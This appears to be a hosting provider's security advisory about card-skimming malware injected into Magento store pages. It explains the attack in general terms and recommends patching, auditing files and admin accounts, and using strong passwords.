There have been multiple versions found in the wild, but they all work the same where the malware is embedded in the header or footer of every page. Once an unsuspecting shopper submits a form that contains anything resembling a credit card number, the whole form is transparently copied, using AJAX, to a remote location.
Magento are themselves saying that the attacks are likely using Admin or database access to implement the exploit and that most impacted sites have not implemented the February 2015 Shoplift patch (SUPEE-5344), or the patch was implemented after the site was already compromised. Attackers can also gain Admin access due to weak passwords, phishing, and other unpatched vulnerabilities.
All Magento sites hosted by Havenswift Hosting are not compromised by this issue but all store owners should always apply all patches available on the Community Edition Download Page as soon as feasible after their release; should regularly check for any unknown files in the system; review and remove all unknown Admin accounts and ensure all admin accounts have very strong passwords (e.g., they should be long, include symbols, upper and lower case letters, and numbers – we very strongly recommend using a password manager like the excellent LastPass)